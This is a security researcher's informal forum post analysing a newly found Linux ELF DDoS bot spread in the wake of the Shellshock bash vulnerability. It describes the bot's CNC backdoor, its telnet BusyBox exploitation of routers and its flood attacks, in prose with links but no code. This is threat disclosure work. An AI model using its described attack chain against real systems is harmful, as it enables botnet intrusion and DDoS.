Linux/Bash0day alias Shellshock alias Bashdoor
ThIs sample was found via @Yinettesys's (credit) IDS sigs: https://gist.github.com/anonymous/929d622f3b36b00c0be1
The sample is up and alive, my analysis I posted in VT (see the comment tab): https://www.virustotal.com/en/file/73b0 ... 411634118/
Announced was 6h ago here: https://twitter.com/yinettesys/status/5 ... 6268604416
And detection ratio is still ZERO..
Anyway, the malware is new, spotted and saved/designed (firstly found) for a #0day , so I named it as Linux/Bash0day < (if you have better name..pls feel free to change.. )/* THIS is what I am afraid of for the ELF malware...sigh.. now you know why I yell ELF a lot!! The AV scanning performance for new ELF itself is ANOTHER 0day actually..*/
Basically the malware is backdoors to a CNC and remotely control (bot) with the busybox rooter attack. CNC info is in the analysis.
It scans for logins + tries to exploit via SCANNER (telnet?) on IPs & gained shell with an "overdue" busybox skids exec_code.. (often sighted in telnet flaw ref is here: https://isc.sans.edu/diary/Busybox+Hone ... nner/18055 ) and gain privilege of the admin/root (if possible).
The main course is : It does DDoS in TCP and UDP so does other attacks (JUNK, HOLD), with backdoor to its CNC.
So it is the "another" DDoS botnet story..
The binary wasn't clearly stripped, yet using silly decrypter, it looks like a "quicky" codings job in some parts, yet well-designed/crypted in many others, I think they prepared it a bit (for this kind of occassion) BEFORE 0day was publicly announced (still < 24day), since the 0day was found in about a week before and mostly is leaked to bad guys faster than good guys.
Answering twitter comments:
A: That SCANNER part is aiming IPs+sent "that" BusyBox codes to exploit (should be telnet..other protocol just doesnt work)..Maybe not a worm, but a morons who wanna build #botnet #DDoS'er upon #0day #bashQ: So, not a worm at least, though that's no consolation for public-facing systems
A: Aiming router for DDoS=2nd→Busybox sploit. WebServers=1st stage←no shellshock trace in #ELF (read: The actor is aiming web server to implement ELF to do the scanning of routers, PoC'ed by the busybox exploit in telnet which only affected routers/embedded linux/or MAYBE ANDROID too! for hack or DDoS or etc purpose which is the actor's end stage, in my opinion. This is backed up by the fact that there is no trace of #bash #0day CGI exploit in the binary ELF itself..I was eager to see that actually.Q: IMO, likely attackers will plant malware in web servers as 2nd stage
I think we will see many more on these will come up.. beware..
Feel free to add, comment, improve, critics, put more samples of the similars. I gotta rest, in hospital bed now, bye!